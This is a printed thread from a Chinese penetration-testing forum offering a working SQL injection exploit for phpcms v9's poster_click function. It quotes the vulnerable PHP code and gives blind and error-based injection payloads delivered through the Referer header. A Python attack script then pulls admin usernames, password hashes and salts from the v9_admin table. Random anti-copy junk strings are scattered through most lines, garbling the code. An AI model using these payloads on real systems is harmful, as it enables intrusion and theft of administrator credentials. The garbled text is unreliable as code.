中国网络渗透测试联盟

标题: phpcms post_click注入0day利用代码 [打印本页]
作者: admin    时间: 2013-1-11 21:01
标题: phpcms post_click注入0day利用代码
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
9 J4 Z- r; Y5 Z
4 T  v% u7 H+ Y5 G& P  R" r" V7 q问题函数\phpcms\modules\poster\index.php7 U9 J$ g5 z9 X4 w  j

) c. b( d. Z5 jpublic function poster_click() {* O9 m$ q: L9 q7 U) Q/ H3 U# W6 }
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
7 H2 I% s5 H' k5 g6 \$r = $this->db->get_one(array('id'=>$id));8 j! o8 H/ I% X( w* b
if (!is_array($r) && empty($r)) return false;
% A8 V( F9 Y) a# J4 T( J$ T$ip_area = pc_base::load_sys_class('ip_area');
8 g5 t2 I9 S% |/ J" j6 v6 v" y$ip = ip();
2 Q8 M$ k4 O: S4 x2 H. f5 H6 L$area = $ip_area->get($ip);8 C+ \9 k2 X& o1 U0 P" I) n
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
2 P. w  e2 S2 I& K1 O8 W) q& fif($id) {
! N. o5 J) S, n' T5 F- V7 ?! q$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();  [2 p% I! j; [. }$ W2 H0 F
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
$ [# z7 ^& w4 v! Q6 c( q4 H7 o- @5 t}
' s  O8 R5 c3 r# @" ]$ K$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));9 o' H. U+ |- }
$setting = string2array($r['setting']);
! C8 h" T) r& kif (count($setting)==1) {8 l3 E+ a& z: ]: O- Q
$url = $setting['1']['linkurl'];
2 f2 h% E% x$ i$ a( _& _} else {  C3 {+ b2 s# F$ G
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
5 X* D" H1 |" D4 W+ E9 C}& }$ ^. G) O' `' F
header('Location: '.$url);3 @& E* l3 `0 I; w% m0 v
}
9 |" h0 [9 w6 M1 `$ V
( A$ |- v" f+ O* U7 ` 9 V, r% R; I9 v
- O: e' ^" S4 x7 a5 \0 G
利用方式:
3 Q. a7 v) R! V) m, E- p9 A3 \5 `! \; W0 E
1、可以采用盲注入的手法:
3 S3 R/ b& C8 |8 S- C; v4 u" H, x; n" E
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#" m$ c% B9 ]8 s) r" i) m% J

$ l8 Q5 u3 e: s通过返回页面,正常与否一个个猜解密码字段。: K7 ?; n" r3 n( U5 C
, E4 D' u0 e1 Z" m5 O1 x: E
2、代码是花开写的,随手附上了:2 o3 |  S/ B. X8 N( B  \) R3 h
$ I1 r4 o0 d, a/ d' n: S( m
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
3 l4 d/ C# m& x8 N( c0 }6 v4 E1 v
此方法是爆错注入手法,原理自查。3 Q7 w! O+ k/ p  S; Y
# M# Z/ p9 m* ?0 |! G+ ]
) k9 r* d% N: k* V/ L
6 c. {4 k3 m' p2 {, [+ c
利用程序:
" u+ F4 i1 Q* l7 b) q9 J! V4 h; y' j$ S" E! o+ J6 U5 i2 S
#!/usr/bin/env python
& _+ V+ Q" K& }5 v% T; limport httplib,sys,re
+ o; x. N3 L7 Q
. B4 O& J4 e" e$ I$ Z: bdef attack():
( G; I# j0 ?3 m- u  A4 M- K' L) Qprint “Code by Pax.Mac Team conqu3r!”
& L% w4 r' u# w" Lprint “Welcome to our zone!!!”
( w5 q- |+ o$ G  ~9 Kurl=sys.argv[1]  Q& |6 ]6 t% `* t' _) H& p
paths=sys.argv[2]
3 ]- Q1 N  ^. v' H: s! Gconn = httplib.HTTPConnection(url)
% l1 f/ T6 p1 Q, A3 |# j& V9 `9 _$ _7 ii_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
* H5 s2 [/ X' @1 S, y6 O“Accept”: “text/plain”,
8 w- o9 B3 B4 F, d“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
  P# H8 N  ?( {9 Vconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
6 s; G5 f# K7 U4 {2 U$ w  I! F% lr1 = conn.getresponse()5 l- U( O5 s/ Q# _" `! }; V% }7 e# o$ I
datas=r1.read()- W. H" _' x" g0 ?( R
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
  q, b8 o/ y" k% o/ O, k, Gprint datas[0]: |! v, h; x# _' D
conn.close()) P- `7 B' d  X& m3 A- U3 ~" d; K" L
if __name__==”__main__”:/ a' J* I6 J; c6 R$ B/ `- m
if len(sys.argv)<3:
* ?# o0 B2 g! [# Y9 vprint “Code by Pax.Mac Team conqu3r”  c" H( N; J& Q- a7 T; }
print “Usgae:”
6 m, P  W0 W% o: y; h5 @# n1 {* _print “    phpcmsattack.py   www.paxmac.org /”
# F9 a5 F3 p# G# [% U- q( ^print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”3 k' f" H: u! v2 A
sys.exit(1)
/ O$ j* u" v( F9 u4 Pattack()3 A" h4 A! b3 \1 c; `

2 I+ L9 K5 Y/ u: ~6 ~



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2